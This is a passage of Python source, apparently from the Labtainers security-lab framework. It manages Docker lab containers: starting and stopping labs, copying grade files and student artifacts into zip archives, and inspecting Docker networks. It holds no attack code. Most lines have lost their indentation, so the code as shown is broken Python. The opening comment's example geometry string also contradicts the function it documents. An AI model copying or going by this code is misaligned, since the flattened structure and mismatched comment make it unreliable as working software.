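# x = 100 + 50*2 = 200 and y = 75 + 50*2 = 175, returning "--geometry 100x25+200+175",
# so each additional terminal is offset 50 pixels right and down from the previous one.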
def terminalWideCounter(terminal_count):
x_coordinate = 100 + ( 50 * terminal_count )
y_coordinate = 75 + ( 50 * terminal_count)
terminal_location = "--geometry 160x35+%d+%d" % (x_coordinate, y_coordinate)
return terminal_location
# Check existence of /home/$USER/$HOST_HOME_XFER directory - create if necessary
def CreateHostHomeXfer(host_xfer_dir):
# remove trailing '/'
host_xfer_dir = host_xfer_dir.rstrip('/')
logger.debug("host_home_xfer directory (%s)" % host_xfer_dir)
if os.path.exists(host_xfer_dir):
# exists but is not a directory
if not os.path.isdir(host_xfer_dir):
# remove file then create directory
os.remove(host_xfer_dir)
os.makedirs(host_xfer_dir)
#else:
# logger.debug("host_home_xfer directory (%s) exists" % host_xfer_dir)
else:
        # does not exist, create the directory
try:
os.makedirs(host_xfer_dir)
except FileNotFoundError as ex:
print('The directory %s does not exist. Perhaps a shared volume is not mounted?' % os.path.dirname(host_xfer_dir))
exit(1)
# CopyChownGradesFile
def CopyChownGradesFile(start_config, labtainer_config, name, container_name, container_user, ignore_stop_error):
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, start_config.labname)
labname = start_config.labname
username = getpass.getuser()
# Copy <labname>.grades.txt file
grade_filename = '/home/%s/%s.grades.txt' % (container_user, labname)
command = "docker cp %s:%s /home/%s/%s" % (container_name, grade_filename, username, host_home_xfer)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command))
logger.debug("Result of subprocess.Popen exec cp %s.grades.txt file is %s" % (labname, result))
if result == FAILURE:
# try grabbing instructor.log
command = "docker cp %s:/tmp/instructor.log /tmp/instructor.log" % (container_name)
result = subprocess.call(shlex.split(command))
logger.debug("Result of subprocess.Popen exec cp instructor.log file is %s" % (result))
clone_names = GetContainerCloneNames(start_config.containers[name])
for clone_full in clone_names:
StopMyContainer(clone_full, ignore_stop_error)
if ignore_stop_error:
logger.debug("Container %s fail on executing cp %s.grades.txt file!\n" % (container_name, labname))
else:
logger.warning("Container %s fail on executing cp %s.grades.txt file!\n" % (container_name, labname))
return
# Copy <labname>.grades.json file
gradejson_filename = '/home/%s/%s.grades.json' % (container_user, labname)
command = "docker cp %s:%s /home/%s/%s" % (container_name, gradejson_filename, username, host_home_xfer)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command))
logger.debug("Result of subprocess.Popen exec cp %s.grades.json file is %s" % (labname, result))
if result == FAILURE:
        clone_names = GetContainerCloneNames(start_config.containers[name])
for clone_full in clone_names:
StopMyContainer(clone_full, ignore_stop_error)
if ignore_stop_error:
logger.debug("Container %s fail on executing cp %s.grades.json file!\n" % (container_name, labname))
else:
logger.warning("Container %s fail on executing cp %s.grades.json file!\n" % (container_name, labname))
return
def StartLab(lab_path, force_build=False, is_redo=False, quiet_start=False,
run_container=None, servers=None, clone_count=None, auto_grade=False, debug_grade=False):
labname = os.path.basename(lab_path)
mycwd = os.getcwd()
myhomedir = os.environ['HOME']
logger.debug("current working directory for %s" % mycwd)
logger.debug("current user's home directory for %s" % myhomedir)
logger.debug("ParseStartConfig for %s" % labname)
isValidLab(lab_path)
lab_count = LabCount.addCount('./', labname, is_redo, logger)
if lab_count == 1:
readFirst(lab_path, labname, 'read_pre.txt', quiet_start, bail_option=True)
labtainer_config, start_config = GetBothConfigs(lab_path, logger, servers, clone_count)
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, labname)
LABS_DIR = os.path.abspath('../../labs')
didfix = False
    ''' hacky assumption about running from labtainers-student or labtainers-instructor '''
container_bin = './bin'
if is_redo or force_build:
my_start_config = os.path.join('./.tmp',labname, 'start.config')
if os.path.isfile(my_start_config):
logger.debug('Cached start.config removed %s' % my_start_config)
os.remove(my_start_config)
x11 = False
container_images = {}
for name, container in start_config.containers.items():
if SkipContainer(run_container, name, start_config, servers):
#print('skipping name %s %s' % (name, start_config.containers[name]))
continue
mycontainer_name = container.full_name
mycontainer_image_name = container.image_name
if container.x11.lower() == 'yes':
x11 = True
if is_redo:
# If it is a redo then always remove any previous container
# If it is not a redo, i.e., start.py then DO NOT remove existing container
clone_names = GetContainerCloneNames(container)
for clone_full in clone_names:
cmd = 'docker rm %s' % clone_full
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
logger.debug("Command was (%s)" % cmd)
if len(output[1]) > 0:
logger.debug("Error from command = '%s'" % str(output[1].decode('utf-8')))
#image_exists, result, dumb = ImageExists(mycontainer_image_name, container.registry)
if container.registry == labtainer_config.test_registry:
branch, container_registry = registry.getBranchRegistry()
base_registry = container_registry
else:
container_registry = container.registry
base_registry = container.base_registry
image_info = imageInfo(mycontainer_image_name, container_registry, base_registry, labtainer_config, quiet=quiet_start)
container_images[name] = image_info
if image_info is not None:
logger.debug('Image version %s framework_version %s' % (image_info.version, framework_version))
if image_info.version is not None and int(image_info.version) > framework_version:
print('**** Labtainer update required *****')
print('This lab requires that you update your labtainers installation.')
print('Please type: update-labtainer.sh')
print('and then try starting the lab again.')
exit(0)
if not image_info.local:
pullDockerImage(container_registry, mycontainer_image_name)
else:
logger.error('Could not find image info for %s' % name)
exit(1)
# Check existence of /home/$USER/$HOST_HOME_XFER directory - create if necessary
host_xfer_dir = '%s/%s' % (myhomedir, host_home_xfer)
CreateHostHomeXfer(host_xfer_dir)
if x11:
sockets = os.listdir('/tmp/.X11-unix')
if len(sockets) == 0:
print('Cannot create X11 windows, the socket is missing. Try rebooting your VM')
logger.debug('Cannot create X11 windows, the socket is missing. Try rebooting your VM')
exit(1)
DoStart(start_config, labtainer_config, lab_path, quiet_start,
run_container, servers=servers, clone_count=clone_count, auto_grade=auto_grade,
debug_grade=debug_grade, container_images=container_images)
def dumb():
pass
'''
'''
def RedoLab(lab_path, force_build=False, is_redo=False, quiet_start=False,
run_container=None, servers=None, clone_count=None, auto_grade=False, debug_grade=False):
mycwd = os.getcwd()
myhomedir = os.environ['HOME']
# Pass 'True' to ignore_stop_error (i.e., ignore certain error encountered during StopLab
# since it might not even be an error)
lab_list, dumb = GetListRunningLabType()
if len(lab_list) > 0:
StopLab(lab_path, True)
is_redo = True
StartLab(lab_path, force_build, is_redo=is_redo, quiet_start=quiet_start,
run_container=run_container, servers=servers, clone_count=clone_count, auto_grade=auto_grade, debug_grade=debug_grade)
def CheckShutdown(lab_path, name, container_name, container_user, ignore_stop_error):
''' NOT USED at the moment '''
done = False
count = 0
while not done:
command='docker cp %s:/tmp/.shutdown_done /tmp/' % (container_name)
logger.debug(command)
child = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error = child.stderr.read().decode('utf-8').strip()
if len(error) > 0:
logger.debug("response from docker cp %s" % error)
time.sleep(1)
else:
logger.debug("must have found the shutdown_done file")
done = True
count += 1
if count > 5:
done = True
def PreStop(container_name, ts):
logger.debug("About to call prestop")
cmd_path = '$HOME/.local/bin/prestop'
cmd = "docker exec %s bash -c 'ls -l %s'" % (container_name, cmd_path)
if DockerCmd(cmd, noloop=True):
cmd = "docker exec %s bash -c 'timeout -s SIGTERM 20s %s >$HOME/.local/result/prestop.stdout.%s 2>&1'" % (container_name, cmd_path, ts)
DockerCmd(cmd, noloop=True)
def GatherOtherArtifacts(lab_path, name, container_name, container_user, container_password, ignore_stop_error):
'''
Parse the results.config file looking for files named by absolute paths,
and copy those into the .local/result directory, maintaining the original
directory structure, e.g., .local/result/var/log/foo.log
'''
config_path = os.path.join(lab_path,"instr_config")
results_config_path = os.path.join(config_path,"results.config")
did_file = []
CopyAbsToResult(container_name, '/root/.bash_history', container_user, ignore_stop_error)
did_file.append('/root/.bash_history')
with open (results_config_path) as fh:
for line in fh:
''' container:filename is between "=" and first " : " '''
line = line.strip()
if line.startswith('#') or len(line) == 0:
continue
if '=' not in line:
logger.warning('no = in line %s' % line)
continue
after_equals = line.split('=', 1)[1].strip()
            # note assumes field delimiters are space-:-space, vice container:file
fname = after_equals.split(' : ')[0].strip()
is_mine = False
if ':' in fname:
'''
[container_name:]<prog>.[stdin | stdout] | [container_name:]file_path[:time_program]
'''
f_container = None
parts = fname.split(':')
if len(parts) == 2:
if parts[0].startswith('/'):
filename = parts[0]
else:
f_container = parts[0]
filename = parts[1]
elif len(parts) == 3:
f_container = parts[0]
filename = parts[1]
if f_container is not None and f_container.strip() == name:
is_mine = True
filename = filename.strip()
else:
is_mine = True
filename = fname
if is_mine:
if filename.startswith('/') and filename not in did_file:
''' copy from abs path to ~/.local/result '''
logger.debug('file on this container to copy <%s>' % filename )
CopyAbsToResult(container_name, filename, container_user, ignore_stop_error)
did_file.append(filename)
def CopyAbsToResult(container_name, fname, container_user, ignore_stop_error):
''' copy from abs path to ~/.local/result '''
    # ensure the destination directory exists before copying
    command='docker exec %s mkdir -p /home/%s/.local/result' % (container_name, container_user)
    os.system(command)
    command='docker exec %s sudo cp --parents %s /home/%s/.local/result' % (container_name, fname, container_user)
logger.debug(command)
child = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error = child.stderr.read().decode('utf-8').strip()
if len(error) > 0:
if ignore_stop_error:
logger.debug('error from docker: %s' % error)
logger.debug('command was %s' % command)
else:
logger.debug('error from docker: %s' % error)
logger.debug('command was %s' % command)
#command='docker exec %s echo "%s\n" | sudo -S chmod a+r -R /home/%s/.local/result' % (container_name, container_password, container_user)
command='docker exec %s sudo chmod a+r -R /home/%s/.local/result' % (container_name, container_user)
child = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error = child.stderr.read().decode('utf-8').strip()
if len(error) > 0:
if ignore_stop_error:
logger.debug('chmod ERROR: %s' % error)
logger.debug('command was %s' % command)
else:
logger.error('chmod ERROR: %s' % error)
logger.error('command was %s' % command)
def CreateCopyChownZip(start_config, labtainer_config, name, container_name, container_image, container_user,
container_password, ignore_stop_error, keep_running, running_container=None):
'''
Zip up the student home directory and copy it to the Linux host home directory
'''
logger.debug('in CreateCopyChownZip')
if running_container is None:
running_container = container_name
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, start_config.labname)
# Run 'Student.py' - This will create zip file of the result
logger.debug("About to call Student.py")
''' Copy the Student.py on each stop to handle cases where the parameter list changes.'''
cmd = 'docker cp lab_bin/Student.py %s:/home/%s/.local/bin/' % (running_container, container_user)
if not DockerCmd(cmd):
logger.error('failed to copy Student.py')
cmd_path = '/home/%s/.local/bin/Student.py' % (container_user)
#command=['docker', 'exec', '-i', container_name, 'echo "%s\n" |' % container_password, '/usr/bin/sudo', cmd_path, container_user, container_image]
command=['docker', 'exec', '-i', running_container, '/usr/bin/sudo', cmd_path, container_user, container_image, str(keep_running)]
logger.debug('cmd: %s' % str(command))
child = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = child.communicate()
''' TBD remaining problems with flushing stdout? '''
#if keep_running and len(output[0].strip()) > 0:
# print('\n<<<<< You may need to stop: %s in order to obtain a complete assessment. >>>>>\n' % output[0].decode('utf-8').strip())
if len(output[1].strip()) > 0:
if ignore_stop_error:
logger.debug("Container %s fail on executing Student.py %s \n" % (running_container, output[1].decode('utf-8')))
else:
logger.error("Container %s fail on executing Student.py %s \n" % (running_container, output[1].decode('utf-8')))
return None, None
logger.debug("results from Student.py: %s" % output[0].decode('utf-8'))
#out_string = output[0].strip()
#if len(out_string) > 0:
# logger.debug('output of Student.py is %s' % out_string)
username = getpass.getuser()
tmp_dir=os.path.join('/tmp/labtainers', container_name)
shutil.rmtree(tmp_dir, ignore_errors=True)
try:
os.makedirs(tmp_dir)
except os.error:
logger.error("did not expect to find dir %s" % tmp_dir)
source_dir = os.path.join('/home', container_user, '.local', 'zip')
cont_source = '%s:%s' % (container_name, source_dir)
logger.debug('will copy from %s ' % source_dir)
command = ['docker', 'cp', cont_source, tmp_dir]
# The zip filename created by Student.py has the format of e-mail.labname.zip
#logger.debug("Command to execute is (%s)" % command)
child = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error_string = child.stderr.read().decode('utf-8').strip()
if len(error_string) > 0:
if ignore_stop_error:
logger.debug("Container %s fail on executing cp zip file: %s\n" % (container_name, error_string))
logger.debug("Command was (%s)" % command)
else:
logger.error("Container %s fail on executing cp zip file: %s\n" % (container_name, error_string))
logger.error("Command was (%s)" % command)
clone_names = GetContainerCloneNames(start_config.containers[name])
for clone_full in clone_names:
StopMyContainer(clone_full, ignore_stop_error)
return None, None
local_tmp_zip = os.path.join(tmp_dir, 'zip')
try:
orig_zipfilenameext = os.listdir(local_tmp_zip)[0]
except:
if ignore_stop_error:
logger.debug('no files at %s\n' % local_tmp_zip)
else:
logger.error('no files at %s\n' % local_tmp_zip)
return None, None
orig_zipfilename, orig_zipext = os.path.splitext(orig_zipfilenameext)
baseZipFilename = os.path.basename(orig_zipfilename)
#NOTE: Use the '=' to separate e-mail+labname from the container_name
DestZipFilename = '%s=%s.zip' % (baseZipFilename, container_name)
DestZipPath = os.path.join('/home', username, host_home_xfer, DestZipFilename)
shutil.copyfile(os.path.join(local_tmp_zip, orig_zipfilenameext), DestZipPath)
currentContainerZipFilename = "/home/%s/%s/%s" % (username, host_home_xfer, DestZipFilename)
return baseZipFilename, currentContainerZipFilename
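# Naming note (illustrative): Student.py creates <e-mail>.<labname>.zip inside the container;
# CreateCopyChownZip() copies it to the host and renames it <e-mail>.<labname>=<container_name>.zip
# in the xfer directory, so the per-container zips can later be combined by GatherZips().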
# Stop my_container_name container
def StopMyContainer(container_name, ignore_stop_error):
command = "docker stop -t 1 %s" % container_name
#logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
if ignore_stop_error:
logger.debug('Fail to stop container, error returned %s' % output[1].decode('utf-8'))
else:
logger.error('Fail to stop container, error returned %s' % output[1].decode('utf-8'))
#if len(output[0].strip()) > 0:
# logger.debug('StopMyContainer stdout %s' % output[0])
#result = subprocess.call(command, shell=True)
def GetContainerID(image):
command = "docker ps"
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
retval = None
if len(output[1].strip()) > 0:
logger.error('Fail to get a list of running containers, error returned %s' % output[1].decode('utf-8'))
elif len(output[0].decode('utf-8')) > 0:
docker_ps_output = output[0].decode('utf-8').split('\n')
for line in docker_ps_output:
line = line.strip()
if image in line:
parts = line.split()
retval = parts[0]
break
return retval
# Get a list of running lab names
def GetListRunningLabType():
lablist = []
is_gns3 = False
# Note: doing "docker ps" not "docker ps -a" to get just the running container
command = "docker ps"
#logger.debug("GetListRunningLab Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to get a list of running containers, error returned %s' % output[1].decode('utf-8'))
sys.exit(1)
if len(output[0].decode('utf-8')) > 0:
docker_ps_output = output[0].decode('utf-8').split('\n')
for each_line in docker_ps_output:
# Skip empty line or the "CONTAINER ID" line - the header line returned by "docker ps"
current_line = each_line.strip()
            if not current_line or current_line.startswith("CONTAINER"):
continue
logger.debug(current_line)
# Assume the container name is the last token on the line
container_info = current_line.split()
container_name = container_info[-1]
# And the image is the 2nd token
image_name = container_info[1]
image_name = os.path.basename(image_name)
if image_name == 'labtainer.master.headless' or image_name == 'labtainer.headless.tester':
continue
if container_name.startswith(image_name):
''' std Labtainers image, get is labname '''
labname = container_name.split('.')[0]
elif 'labtainer' in image_name:
''' gns3 labtainer image '''
labname = image_name.split('_', 1)[0]
is_gns3 = True
elif container_name.endswith('.student'):
''' docker is sick, changed image name to checksum. '''
labname = container_name.split('.')[0]
else:
logger.debug('not a labtainer: %s' % image_name)
continue
if labname not in lablist:
logger.debug('appending %s' % labname)
lablist.append(labname)
return lablist, is_gns3
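# Note (added for clarity): GetListRunningLabType() returns (lablist, is_gns3): the lab names
# inferred from running container/image names, plus a flag noting whether a GNS3-style
# labtainer image was among them.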
def GetListRunningLab():
lab_list, is_gns3 = GetListRunningLabType()
return lab_list
# Given a network name, if it is valid, return a list of lab names for the container(s) using that network.
# Note: the network name is passed in as an argument
def GetListLabContainerOnNetwork(network_name):
containerlabnamelist = []
command = "docker network inspect %s" % network_name
#logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to inspect the network %s, error returned %s' % (network_name, output[1].decode('utf-8')))
sys.exit(1)
if len(output[0]) > 0:
network_result = json.loads(output[0].decode('utf-8'))
if len(network_result) != 0:
result = network_result[0]
containers = result["Containers"]
for key in containers:
container_name = containers[key]["Name"]
# Assume the labname is the first token if split by '.'
labname = container_name.split('.')[0]
if labname not in containerlabnamelist:
containerlabnamelist.append(labname)
return containerlabnamelist
# Given an IP address (gateway IP address) - find a network name that has that IP address as its gateway
# Note: the IP address is passed in as an argument
def FindNetworkGivenGatewayIP(gateway_address):
found_match_network = False
found_match_network_name = ""
logger.debug("FindNetworkGivenGatewayIP %s" % gateway_address)
networklist = []
# First get a list of network name of driver=bridge
command = "docker network ls --filter driver=bridge"
#logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to get a list of network (driver=bridge), error returned %s' % output[1].decode('utf-8'))
sys.exit(1)
if len(output[0]) > 0:
network_list = output[0].decode('utf-8').split('\n')
for each_line in network_list:
# Skip empty line or the "NETWORK ID" line - the header line returned by "docker network"
current_line = each_line.strip()
if not current_line or current_line.startswith("NETWORK"):
continue
# Assume the network name is the second token on the line
container_info = current_line.split()
network_name = container_info[1]
# Do not need to check network name "bridge"
if network_name != "bridge" and network_name not in networklist:
networklist.append(network_name)
# Loop through each network (driver=bridge) to find if any uses IP address as gateway
for network_name in networklist:
command = "docker network inspect %s" % network_name
#logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to inspect the network %s, error returned %s' % (network_name, output[1].decode('utf-8')))
sys.exit(1)
if len(output[0]) > 0:
network_result = json.loads(output[0].decode('utf-8'))
if len(network_result) != 0:
result = network_result[0]
ipam_config = result["IPAM"]["Config"][0]
for key in ipam_config:
if key == "Gateway":
ipam_config_gateway_ip = ipam_config[key]
if gateway_address == ipam_config_gateway_ip:
found_match_network = True
found_match_network_name = network_name
break
return found_match_network, found_match_network_name
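# Illustrative usage (hypothetical values, not from the original source):
#   found, net_name = FindNetworkGivenGatewayIP('172.20.0.1')
#   if found:
#       logger.debug('gateway already in use by docker network %s' % net_name)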
# Given a subnet (network subnet) - find a network name that has that same subnet
# Note: the subnet is passed in as an argument
def FindNetworkGivenSubnet(subnet):
found_match_network = False
found_match_network_name = ""
logger.debug("FindNetworkGivenSubnet %s" % subnet)
networklist = []
# First get a list of network name of driver=bridge
command = "docker network ls --filter driver=bridge"
#logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to get a list of network (driver=bridge), error returned %s' % output[1].decode('utf-8'))
sys.exit(1)
if len(output[0]) > 0:
network_list = output[0].decode('utf-8').split('\n')
for each_line in network_list:
# Skip empty line or the "NETWORK ID" line - the header line returned by "docker network"
current_line = each_line.strip()
if not current_line or current_line.startswith("NETWORK"):
continue
# Assume the network name is the second token on the line
container_info = current_line.split()
network_name = container_info[1]
# Do not need to check network name "bridge"
if network_name != "bridge" and network_name not in networklist:
networklist.append(network_name)
# Loop through each network (driver=bridge) to find if any that has the same subnet
for network_name in networklist:
command = "docker network inspect %s" % network_name
#logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].decode('utf-8').strip()) > 0:
logger.error('Fail to inspect the network %s, error returned %s' % (network_name, output[1].decode('utf-8')))
sys.exit(1)
if len(output[0]) > 0:
network_result = json.loads(output[0].decode('utf-8'))
if len(network_result) != 0:
result = network_result[0]
ipam_config = result["IPAM"]["Config"][0]
for key in ipam_config:
if key == "Subnet":
ipam_config_subnet = ipam_config[key]
if subnet == ipam_config_subnet:
found_match_network = True
found_match_network_name = network_name
break
return found_match_network, found_match_network_name
def AllContainersRunning(container):
clone_names = GetContainerCloneNames(container)
for clone_full in clone_names:
if not IsContainerRunning(clone_full):
return False
return True
def IsContainerRunning(mycontainer_name):
cmd = 'docker ps -f id=%s' % mycontainer_name
try:
dumb = int(mycontainer_name, 16)
except:
cmd = 'docker ps -f name=%s' % mycontainer_name
try:
s = subprocess.check_output(shlex.split(cmd)).decode('utf-8')
except:
return False
if mycontainer_name in s:
return True
else:
return False
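# Note (added for clarity): IsContainerRunning() accepts either a container id or a name; if the
# argument parses as a hex value it filters "docker ps" by id, otherwise it falls back to
# filtering by name.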
def ShouldBeRunning(start_config, container):
if start_config.multi_user is not None and start_config.multi_user != 'clones':
if start_config.multi_user == 'server' and container.client == 'yes':
return False
if start_config.multi_user == 'client' and container.client != 'yes':
return False
return True
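# Note (added for clarity): ShouldBeRunning() reflects multi-host labs: when start_config.multi_user
# is 'server' or 'client', only containers matching the local role are expected to be running, so
# DoStopOne below does not treat a missing remote-role container as an error.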
def DoStopOne(start_config, labtainer_config, lab_path, name, container, zip_file_list, ignore_stop_error, results, keep_running):
labname = os.path.basename(lab_path)
#dumlog = os.path.join('/tmp', name+'.log')
#sys.stdout = open(dumlog, 'w')
#sys.stderr = sys.stdout
retval = True
mycontainer_name = container.full_name
container_user = container.user
container_password = container.password
mycontainer_image = container.image_name
haveContainer = AllContainersCreated(container)
logger.debug("AllContainersCreated for %s result (%s)" % (container.name, haveContainer))
    # IsContainerCreated returned FAILURE if the container does not exist
# error: can't stop non-existent container
if not haveContainer:
if ShouldBeRunning(start_config, container) and not ignore_stop_error:
logger.error("Container %s does not exist!\n" % mycontainer_name)
retval = False
elif container.tap == 'yes':
StopMyContainer(mycontainer_name, ignore_stop_error)
else:
clone_names = GetContainerCloneNames(container)
for mycontainer_name in clone_names:
if not IsContainerRunning(mycontainer_name):
if ShouldBeRunning(start_config, container):
if ignore_stop_error:
logger.debug("container %s not running\n" % (mycontainer_name))
else:
logger.error("container %s not running\n" % (mycontainer_name))
retval = False
continue
GatherOtherArtifacts(lab_path, name, mycontainer_name, container_user, container_password, ignore_stop_error)
# Before stopping a container, run 'Student.py'
# This will create zip file of the result
baseZipFilename, currentContainerZipFilename = CreateCopyChownZip(start_config, labtainer_config, name,
mycontainer_name, mycontainer_image, container_user, container_password, ignore_stop_error, keep_running)
if baseZipFilename is not None:
if currentContainerZipFilename is not None:
zip_file_list.append(currentContainerZipFilename)
else:
logger.debug('currentContainerZipFilename is None for container %s' % mycontainer_name)
logger.debug("baseZipFilename is (%s)" % baseZipFilename)
else:
logger.debug("baseZipFileName is None for container %s" % mycontainer_name)
#command = 'docker exec %s echo "%s\n" | sudo -S rmdir /tmp/.mylockdir 2>/dev/null' % (mycontainer_name, container_password)
command = 'docker exec %s sudo rmdir /tmp/.mylockdir 2>/dev/null' % (mycontainer_name)
os.system(command)
if not keep_running:
did_this = []
for mysubnet_name, mysubnet_ip in container.container_nets.items():
subnet_name = mysubnet_name
if ':' in mysubnet_name:
subnet_name = mysubnet_name.split(':')[0]
if subnet_name not in did_this:
disconnectNetworkResult = DisconnectNetworkFromContainer(mycontainer_name, subnet_name)
did_this.append(subnet_name)
# Stop the container
if not keep_running:
StopMyContainer(mycontainer_name, ignore_stop_error)
results.append(retval)
def SynchStop(start_config, run_container=None):
threads = []
now = datetime.datetime.now()
''' NOTE all prestop stdout will have same timestamp. '''
ts = now.strftime('%Y%m%d%H%M%S')
for name, container in start_config.containers.items():
if run_container is not None and container.full_name != run_container:
#print('not for me %s ' % run_container)
continue
clone_names = GetContainerCloneNames(container)
for mycontainer_name in clone_names:
t = threading.Thread(target=PreStop, args=[mycontainer_name, ts])
threads.append(t)
t.setName(name)
t.start()
logger.debug('prestop started on all')
for t in threads:
t.join()
logger.debug('joined %s' % t.getName())
def GatherZips(zip_file_list, labtainer_config, start_config, labname, lab_path):
mycwd = os.getcwd()
if len(zip_file_list) == 0:
logger.error('GatherZips called without any zips')
return
try:
base_filename = os.path.basename(zip_file_list[0])
except:
logger.error('No basefile found in %s' % zip_file_list[0])
return
baseZipFilename = base_filename.split('=')[0]
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, labname)
username = getpass.getuser()
xfer_dir = "/home/%s/%s" % (username, host_home_xfer)
try:
os.makedirs(xfer_dir)
except:
pass
# Create docs.zip in xfer_dir if COLLECT_DOCS is "yes"
if start_config.collect_docs.lower() == "yes":
docs_zip_file = "%s/docs.zip" % xfer_dir
logger.debug("Zipping docs directory to %s" % docs_zip_file)
docs_path = '%s/docs' % lab_path
if os.path.isdir(docs_path):
docs_zip_filelist = glob.glob('%s/*' % docs_path)
logger.debug(docs_zip_filelist)
# docs.zip file
docs_zipoutput = zipfile.ZipFile(docs_zip_file, "w")
# Go to the docs_path
os.chdir(docs_path)
for docs_fname in docs_zip_filelist:
docs_basefname = os.path.basename(docs_fname)
docs_zipoutput.write(docs_basefname, compress_type=zipfile.ZIP_DEFLATED)
# Note: DO NOT remove after the file is zipped
docs_zipoutput.close()
# Add docs.zip into the zip_file_list
zip_file_list.append(docs_zip_file)
else:
logger.debug('no docs at %s' % docs_path)
# Combine all the zip files
logger.debug("zip_file_list is ")
logger.debug(zip_file_list)
logger.debug("baseZipFilename is (%s)" % baseZipFilename)
oldfile = "%s/%s.zip" % (xfer_dir, baseZipFilename)
if os.path.isfile(oldfile):
os.remove(oldfile)
combinedZipFilename = "%s/%s.lab" % (xfer_dir, baseZipFilename)
logger.debug("The combined zip filename is %s" % combinedZipFilename)
with open(combinedZipFilename, 'w') as fh:
fh.write('Foil click-happy students')
zipoutput = zipfile.ZipFile(combinedZipFilename, "a")
# Go to the xfer_dir
os.chdir(xfer_dir)
for fname in zip_file_list:
basefname = os.path.basename(fname)
zipoutput.write(basefname, compress_type=zipfile.ZIP_DEFLATED)
# Remove after the file is zipped
os.remove(basefname)
# Add count.json and labtainer.log (if they exist) to the zip file
count_path = LabCount.getPath('./', labname)
#print "count_path is %s" % count_path
if os.path.isfile(count_path):
parent = os.path.dirname(count_path)
os.chdir(mycwd)
os.chdir(parent)
fname = os.path.join('./', os.path.basename(count_path))
zipoutput.write(fname, compress_type=zipfile.ZIP_DEFLATED)
os.chdir(mycwd)
my_labtainer_log = os.path.join('./', 'labtainer.log')
if os.path.exists(my_labtainer_log):
zipoutput.write(my_labtainer_log, compress_type=zipfile.ZIP_DEFLATED)
zipoutput.close()
post_zip = os.path.join(lab_path, 'bin', 'postzip')
if os.path.isfile(post_zip):
cmd = "%s %s" % (post_zip, combinedZipFilename)
os.system(cmd)
os.chdir(mycwd)
def DoStop(start_config, labtainer_config, lab_path, ignore_stop_error, run_container=None, servers=None, clone_count=None, keep_running=False):
retval = True
labname = os.path.basename(lab_path)
logger.debug("DoStop Multiple Containers and/or multi-home networking, keep_running is %r" % keep_running)
SynchStop(start_config, run_container)
baseZipFilename = ""
zip_file_list = []
threads = []
results = []
for name, container in start_config.containers.items():
if run_container is not None and container.full_name != run_container:
#print('not for me %s ' % run_container)
continue
mycontainer_name = '%s.%s.student' % (labname, container.name)
t = threading.Thread(target=DoStopOne, args=(start_config, labtainer_config, lab_path,
name, container, zip_file_list, ignore_stop_error, results, keep_running))
threads.append(t)
t.setName(name)
t.start()
logger.debug('stopped all')
for t in threads:
t.join()
logger.debug('joined %s' % t.getName())
if not keep_running:
RemoveSubnets(start_config.subnets, ignore_stop_error)
if not ignore_stop_error:
if False in results:
logger.error('DoStopOne has at least one failure!')
sys.exit(1)
if len(zip_file_list) == 0:
if ignore_stop_error:
logger.debug('No zip files found')
else:
logger.error('No zip files found')
return None
''' Check for empty email identifier '''
if zip_file_list[0].startswith('.'):
        logger.error('Missing email for student, cannot gather artifacts')
return None
GatherZips(zip_file_list, labtainer_config, start_config, labname, lab_path)
return retval
# ignore_stop_error - set to 'False' : do not ignore errors
# ignore_stop_error - set to 'True' : ignore certain errors, since they might not actually be errors,
#                     such as those encountered when trying to stop a non-existent container
def StopLab(lab_path, ignore_stop_error, run_container=None, servers=None, clone_count=None, keep_running=False):
labname = os.path.basename(lab_path)
if labname.endswith('labtainer.grader'):
return None
myhomedir = os.environ['HOME']
logger.debug("keep_running is %r" % keep_running)
logger.debug("ParseStartConfig for %s" % labname)
isValidLab(lab_path)
labtainer_config, start_config = GetBothConfigs(lab_path, logger, servers, clone_count)
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, labname)
# Check existence of /home/$USER/$HOST_HOME_XFER directory - create if necessary
host_xfer_dir = '%s/%s' % (myhomedir, host_home_xfer)
CreateHostHomeXfer(host_xfer_dir)
if DoStop(start_config, labtainer_config, lab_path, ignore_stop_error, run_container=run_container,
servers=servers, clone_count=clone_count, keep_running=keep_running):
# Inform user where results are stored
print("Results stored in directory: %s" % host_xfer_dir)
syncdir = os.path.join(os.getenv('LABTAINER_DIR'), 'scripts','labtainer-student', '.tmp', labname, 'sync')
try:
